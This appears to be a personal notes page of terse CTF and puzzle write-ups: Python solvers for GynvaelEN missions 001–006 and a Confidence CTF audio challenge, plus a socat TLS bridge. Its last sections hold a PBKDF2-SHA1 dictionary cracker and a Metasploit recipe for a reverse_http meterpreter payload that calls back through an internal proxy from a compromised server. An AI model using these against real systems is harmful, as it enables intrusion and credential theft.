# GynvaelEN's mission 006


# cat mission_06.py
from PIL import Image
import qrtools

n = 25
m = 3
fn = 'mission_06.png'

matrix = [255 for i in range(n * n)]

with open('mission_06.data') as f:
 data = f.read().splitlines()

for line in data:
 line = line[1:-1].split(', ')
 i = int(line[0])
 j = int(line[1])
 matrix[(i*n) + j] = 0

image = Image.new('L', (n, n))
image.putdata(matrix)
image.save(fn)

img = Image.open(fn)
img = img.rotate(-90)
img = img.resize((n * m, n * m), Image.ANTIALIAS)
img.save(fn)

qr = qrtools.QR(filename = fn)
if qr.decode():
 print qr.data

# python mission_06.py
Mirrored QR? Seriously?!

Source

https://www.youtube.com/watch?v=KvyBn4Btv8E (1:32:02)

# GynvaelEN's mission 005


# curl -v http://gynvael.vexillium.org/ext/thepicture/picture.image
Content-Encoding: rle
Content-Type: image/raw; w=640,h=212,bpp=8
# cat mission_05.py
from struct import unpack
from PIL import Image

with open('picture.image') as f:
 cdata = f.read()

ddata = []

for i in range(0, len(cdata), 2):
 v = unpack('B', cdata[i + 1])[0] ^ 1
 for _ in range(unpack('B', cdata[i])[0]):
  ddata.append(v * 255)

image = Image.new('L', (640, 212))
image.putdata(ddata)
image.save('output.png')
# python mission_05.py


Source

https://www.youtube.com/watch?v=W7s5CWaw6I4 (1:20:57)

Reference

https://en.wikipedia.org/wiki/Run-length_encoding

# Confidence CTF 2k17: Starbyte - misc - 200 pts


# cat starbyte.py
from PIL import Image, ImageDraw
import scipy.io.wavfile
import sys
import wave

inputfile = sys.argv[1]

wave_read_object = wave.open(inputfile, 'rb')
print 'Number of audio channels = ',  wave_read_object.getnchannels()
print 'Sample width = ', wave_read_object.getsampwidth(), '(bytes)'
print 'Sampling frequency = ', wave_read_object.getframerate(), '(Hz)'
frames = wave_read_object.getnframes()
print 'Number of audio frames = ', frames
wave_read_object.close()
rate, data = scipy.io.wavfile.read(inputfile)

last_frame = -1
c = ''
r = ''
i = 0

for frame in data:
 if frame > 90:
  if last_frame != 1:
   c += '1'
   i += 1
  last_frame = 1
 elif frame > 23:
  if  last_frame != 0:
   c += '0'
   i += 1
  last_frame = 0
 else:
  last_frame = -1
 if i == 10:
  nc = ''
  for j in c:
   nc = j + nc
  r += chr(int(nc, 2))
  c = ''
  i = 0
r = r.split('\n')

image = Image.new('RGB', (1000, 1000), 'black')
draw = ImageDraw.Draw(image)

for line in r:
 line = line.split()
 if 'LINE' in line:
  x1, y1, x2, y2 = map(int, line[1:])
  draw.line([(x1, y1), (x2, y2)], 'green')
 #elif 'REKT' in line:
 # x1, y1, x2, y2 = map(int, line[1:])
 # draw.rectangle([(x1, y1), (x2, y2)], None, 'green')
 elif 'CRCL' in line:
  x1, y1, rad = map(int, line[1:])
  draw.arc([(x1 - rad, y1 - rad), (x1 + rad, y1 + rad)], 0, 360, 'green')

image.save('image.png')
# python starbyte.py starbyte.wav
Number of audio channels =  1
Sample width =  1 (bytes)
Sampling frequency =  44100 (Hz)
Number of audio frames =  3885808
# eog image.png

# GynvaelEN's mission 004


# cat mission_04.py
def hex2bin(h):
 binary = ''
 for i in range(0, len(h), 2):
  byte = u[i:i + 2]
  binary += format(int(byte, 16), '08b')
 return binary

def decode(u):
 lu = len(u)
 if lu == 2:
  return u.decode('hex')
 elif lu  == 4:
  binary = hex2bin(u)
  r = binary[3:8] + binary[10:]
  return chr(int(r, 2))
 elif lu  == 6:
  binary = hex2bin(u)
  r = binary[4:8] + binary[10:16] + binary[18:]
  return chr(int(r, 2))
 elif lu  == 8:
  binary = ''
  binary = hex2bin(u)
  r = binary[5:8] + binary[10:16] + binary[18:24] + binary[26:]
  return chr(int(r, 2))

message = 'E0818F766572C1ACE081AFE081AEC1A7E080A0E08195C194E081862DE080B8E080A0F08081B7C1A17320C1B3F08081B563C1A820E081A1F08080A0E081A6F08081B5F08081AE20E081A6E081A5F08081A1C1B475E081B2E081A5F08080AE'

result = ''

i = 0

while i < len(message):
 byte = int(message[i:i+2], 16)
 binary = format(byte, '08b')
 if binary[0] == '0':
  j = 2
 elif binary[0:3] == '110':
  j = 4
 elif binary[0:4] == '1110':
  j = 6
 elif binary[0:5] == '11110':
  j = 8
 u = message[i:i + j]
 i += j
 result += decode(u)

print result
# python mission_04.py
Overlong UTF-8 was such a fun feature.

Source

https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)

Reference

https://es.wikipedia.org/wiki/UTF-8#Codificaci.C3.B3n_de_los_caracteres

# GynvaelEN's mission 003


# cat mission_03.py
import itertools

def base4to10(num):
 result = 0
 ln = len(num) - 1
 for i in num:
  result += int(i) * (4 ** ln)
  ln -= 1
 return result

def ascii_string(s):
 for i in s:
  if ord(i) < 32 or ord(i) > 126:
   return False
 return True

with open('huffman.code') as f:
 bd = f.read()[:-1]

values = ['0', '1', '00', '01', '10', '11', '000', '001', '010', '011', '100', '101', '110', '111']

for i in itertools.permutations(values, 4):
 tree = {
  i[0]: '0',
  i[1]: '1',
  i[2]: '2',
  i[3]: '3',
 }
 code = ''
 result = ''
 for d in bd:
  code += d
  if code in tree:
   result += tree[code]
   code = ''
 try:
  decv  = base4to10(result)
  hexv = hex(decv)[2:].replace('L', '')
  ascv  = hexv.decode('hex')
  if ascii_string(ascv) and len(ascv) > 4:
   print 'tree =', tree
   print 'result =', result
   print 'dec =', decv
   print 'bytes =', hexv
   print 'ascii =', ascv[::-1]
   print
 except:
  pass

# python mission_03.py
tree = {'11': '1', '0': '2', '100': '0', '101': '3'}
result = 3231202120213111211131203001031030012101202131112031322131303001323130113211313131312111030030013010300120213011212030012101031
dec = 26860288614901905570716094189682157357950360778336264927367113021610209076301
bytes = 3b6262756576304d30646275637a77307b71797777654c30713062716630644d
ascii = Md0fqb0q0Lewwyq{0wzcubd0M0veubb;

tree = {'11': '1', '0': '3', '100': '0', '101': '2'}
result = 2321303130312111311121302001021020013101303121113021233121202001232120112311212121213111020020012010200130312011313020013101021
dec = 21010374883428224108739011194252932925839770786883498221738205492211234141257
bytes = 2e7373657567204920747365726f66206e616d66667548206120736177207449
ascii = It was a Huffman forest I guess.

Source

https://www.youtube.com/watch?v=iwRSFlZoSCM (1:26:42)

# GynvaelEN's mission 002


# cat mission_02.py
tree = {
'01': '0',
'0010': '1',
'0001': '2',
'00110': '3',
'10': '4',
'000000': '5',
'00000100': '6',
'00000101': '7',
'00000110': '8',
'00000111': '9',
'00001': 'a',
'001110': 'b',
'001111': 'c',
'111': 'd',
'1101': 'e',
'1100': 'f'

}

code = ''
hexencoded = ''

with open('huffman.code') as f:
 bd = f.read()[:-1]
 for d in bd:
  code += d
  if code in tree:
   hexencoded += tree[code]
   code = ''
print hexencoded
print hexencoded.decode('hex')

# python mission_02.py
49204c696b652054726565732e20466c6f7765727320746f6f2e
I Like Trees. Flowers too.

Source

https://www.youtube.com/watch?v=HN_tI601jNU (1:38:27)

Reference

https://www.siggraph.org/education/materials/HyperGraph/video/mpeg/mpegfaq/huffman_tutorial.html

# GynvaelEN's mission 001


# wget https://github.com/dwyl/english-words/raw/master/words.txt
# grep '^........$' words.txt > wordlist.txt
# cat mission_001.py
import hashlib

solution = '76fb930fd0dbc6cba6cf5bd85005a92a'.decode('hex')

wh = {}

with open('wordlist.txt') as f:
 for word in f.read().splitlines():
  h = hashlib.md5(word).digest()
  wh[h] = word

for k, v in wh.iteritems():
 result = ''.join([chr(ord(b1)^ord(b2)) for b1,b2 in zip(k, solution)])
 if result in wh:
  print v, wh[result]
  break
# python mission_001.py
ambrosia virology

Source

https://www.youtube.com/watch?v=JhsHGms_7JQ (1:21:51)

# TLS bridge with socat


# openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
# cat key.pem > server.pem
# cat cert.pem >> server.pem
# socat -v openssl-listen:443,cert=/tmp/server.pem,verify=0,reuseaddr,fork,method=ssl3 ssl:127.0.0.1:1234,verify=0,method=tls1.2

# Cracking PBKDF2WithHmacSHA1/160/128000


# cat crack.py
import base64
import hashlib
import sys

dict = sys.argv[1]
b64e = sys.argv[2]
b64d = base64.b64decode(b64e)
secret = b64d[16:]

f = open(dict)
words = f.read().splitlines()
f.close()

hash_name = 'sha1'
salt = b64d[8:16]
iterations = 128000
dklen = 160 / 8

for word in words:
 dk = hashlib.pbkdf2_hmac(hash_name, word, salt, iterations, dklen)
 if dk == secret:
  print b64e, word
  break

# cat dict.txt
test

# python crack.py dict.txt AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp
AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp test

References

https://en.wikipedia.org/wiki/PBKDF2
https://docs.python.org/3/library/hashlib.html#key-derivation

# Reverse meterpreter through an internal HTTP proxy server


Attacker's host

msf > use payload/python/meterpreter/reverse_http
msf payload(reverse_http) > set lhost LOCAL_PUBLIC_IP
msf payload(reverse_http) > set lport 80
msf payload(reverse_http) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf payload(reverse_http) > set payloadproxyport INTERNAL_PROXY_PORT
msf payload(reverse_http) > generate -b '\x00\xff' -t raw -f met.py

msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_http
msf exploit(handler) > set lhost LOCAL_PUBLIC_IP
msf exploit(handler) > set lport 80
msf exploit(handler) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf exploit(handler) > set PayloadProxyPort INTERNAL_PROXY_PORT
msf exploit(handler) > run

Compromised server

# python met.py